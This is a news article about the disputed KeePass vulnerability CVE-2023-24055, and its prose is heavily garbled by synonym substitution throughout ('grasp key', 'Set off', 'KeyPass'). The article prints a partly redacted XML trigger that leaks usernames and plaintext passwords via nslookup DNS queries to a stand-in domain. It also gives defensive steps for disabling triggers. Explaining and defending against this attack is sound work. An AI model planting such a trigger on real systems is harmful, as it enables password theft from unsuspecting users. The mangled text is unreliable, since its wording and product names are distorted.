It’s been a newsworthy few weeks for password managers – these helpful utilities that provide help to provide you with a unique password for each web site you employ, after which to maintain observe of all of them.
On the finish of 2022, it was the flip of LastPass to be all around the information, when the corporate lastly admitted {that a} breach it suffered again in August 2022 did certainly find yourself with clients’ password vaults getting stolen from the cloud service the place they had been backed up.
(The passwords themselves weren’t stolen, as a result of the vaults had been encrypted, and LastPass didn’t have copies of anybody’s “grasp key” for the backup vault information themselves, however it was a better shave than most individuals had been comfortable to listen to.)
Then it was LifeLock’s flip to be all around the information, when the corporate warned about what appeared like a rash of password guessing assaults, most likely based mostly on passwords stolen from a very totally different web site, probably a while in the past, and maybe bought on the darkish net lately.
LifeLock itself hadn’t been breached, however a few of its customers had, because of password-sharing behaviour brought on by dangers they may not even keep in mind having taken.
Competitiors 1Password and BitWarden have been within the information lately, too, based mostly on stories of malicious adverts, apparently unwittingly aired by Google, that convincingly lured customers to reproduction logon pages aimed toward phishing their account particulars.
Now it’s KeePass’s flip to be within the information, this time for one more cybersecurity concern: an alleged vulnerability, the jargon time period used for software program bugs that result in cybersecurity holes that attackers would possibly be capable to exploit for evil functions.
Password sniffing made straightforward
We’re referring to it as a vulnerability right here as a result of it does have an official bug identifier, issued by the US Nationwide Institute for Requirements and Expertise.
The bug has been dubbed CVE-2023-24055: Attacker who has write entry to the XML configuration file [can] get hold of the cleartext passwords by including an export set off.
The declare about with the ability to get hold of cleartext passwords, sadly, is true.
If I’ve write entry to your private information, together with your so-called %APPDATA% listing, I can sneakily tweak the configuration part to change any KeyPass settings that you’ve got already customised, or so as to add customisations when you haven’t knowingly modified something…
…and I can surprisingly simply steal your plaintext passwords, both in bulk, for instance by dumping the entire database as an unencrypted CSV file, or as you employ them, for instance by setting a “program hook” that triggers each time you entry a password from the database.
Observe that I don’t want Administrator privileges, as a result of I don’t must mess with the precise set up listing the place the KeyPass app will get saved, which is often off-limits to common customers.
And I don’t want entry to any locked-down world configuration settings.
Curiously, KeyPass goes out of its method to cease your passwords being sniffed out once you use them, together with utilizing tamper-protection methods to cease varied anti-keylogger tips even from customers who have already got sysadmin powers.
However the KeyPass software program additionally makes it surprisingly straightforward to seize plaintext password information, maybe in methods you would possibly think about “too straightforward”, even for non-administrators.
It was a minute’s work to make use of the KeePass GUI to create a Set off occasion to run each time you copy a password into the clipboard, and to set that occasion to do a DNS lookup that included each the username and the plaintext password in query:
We might then copy the not-terribly-obvious XML setting for that choice out of our personal native configuration file into the configuration file of one other consumer on the system, after which they too would discover their passwords being leaked over the web by way of DNS lookups.
Though the XML configuration information is essentially readable and informative, KeePass curiously makes use of random information strings generally known as GUIDs (brief for globally distinctive identifiers) to indicate the assorted Set off settings, in order that even a well-informed consumer would want an intensive reference checklist to make sense of which triggers are set, and the way.
Right here’s what our DNS-leaking set off appears to be like like, although we redacted a few of the particulars so you may’t stand up to any quick mischief simply by copying-and-pasting this textual content instantly:
<Set off>
<Guid>XXXXXXXXXXXXXXXXXXXX</Guid>
<Title>Copy</Title>
<Feedback>Steal stuff by way of DNS lookups</Feedback>
<Occasions>
<Occasion>
<TypeGuid>XXXXXXXXXXXXXXXXXXXX</TypeGuid>
<Parameters>
<Parameter>0</Parameter>
<Parameter />
</Parameters>
</Occasion>
</Occasions>
<Situations />
<Actions>
<Motion>
<TypeGuid>XXXXXXXXXXXXXXXXXXXX</TypeGuid>
<Parameters>
<Parameter>nslookup</Parameter>
<Parameter>XXXXX.XXXXX.blah.check</Parameter>
<Parameter>True</Parameter>
<Parameter>1</Parameter>
<Parameter />
</Parameters>
</Motion>
</Actions>
</Set off>
With this set off energetic, accessing a KeePass password causes the plaintext to leak out in an unobtrusive DNS lookup to a website of my selection, which is blah.check on this instance.
Observe that real-life attackers would virtually definitely scramble or obfuscate the stolen textual content, which might not solely make it tougher to identify when DNS leaks had been taking place, but in addition maintain passwords containing non-ASCII characters, akin to accented letters or emojis, that may’t in any other case be utilized in DNS names:
However is it actually a bug?
The difficult query, nonetheless, is, “Is that this actually a bug, or is it only a highly effective characteristic that may very well be abused by somebody who would already want at the very least as a lot management over your personal information as you will have your self?”
Merely put, is it a vulnerability if somebody who already has management of your account can mess with information that your account is meant to have the ability to entry anyway?
Though you would possibly hope {that a} pssword supervisor would come with a lot of further layers of tamper-protection to make it tougher for bugs/options of this kind to be abused, ought to CVE-2023-24055 actually be a CVE-listed vulnerability?
If that’s the case, wouldn’t instructions akin to DEL (delete a file) and FORMAT have to be “bugs”, too?
And wouldn’t the very existence of PowerShell, which makes probably harmful behaviour a lot simpler to impress (attempt powerhsell get-clipboard, as an example), be a vulnerability all of its personal?
That’s KeePass’s place, acknowledged by the next textual content that has been added to the “bug” element on NIST’s web site:
** DISPUTED ** […] NOTE: the seller’s place is that the password database isn’t meant to be safe in opposition to an attacker who has that stage of entry to the native PC.
What to do?
In the event you’re a standalone KeyPass consumer, you may examine for rogue Triggers just like the “DNS Stealer” we created above by opening the KeyPass app and skimming the Instruments > Triggers… window:
Observe that you could flip the whole Set off system off from this window, just by deslecting the [ ] Allow set off system choice…
…however that isn’t a worldwide setting, so it may be turned again on once more by way of your native configuration file, and subsequently solely protects you from errors, somewhat than from an attacker with entry to your account.
You’ll be able to drive the choice off for everybody on the pc, with no choice for them to show it again on themselves, by modifying the worldwide “lockdown” file KeePass.config.enforced.XML, discovered within the listing the place the app program itself is intalled.
Triggers can be pressured off for everybody in case your world XML enforcement file appears to be like like this:
<?xml model="1.0" encoding="utf-8"?>
<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Software>
<TriggerSystem>
<Enabled>false</Enabled>
</TriggerSystem>
</Software>
</Configuration>
(In case you’re questioning, an attacker who has write entry to the applying listing to reverse this modification would virtually definitely have sufficient system-level energy to change the KeyPass app totally, or to put in and activate a standalone keylogger anyway.)
In the event you’re a community administrator tasked with locking down KeyPass in your customers’ computer systems in order that it’s nonetheless versatile sufficient to assist them, however not versatile sufficient for them to assist cybercriminals by mistake, we suggest studying by means of the KeyPass Safety Points web page, the Triggers web page, and the Enforced Configuration web page.
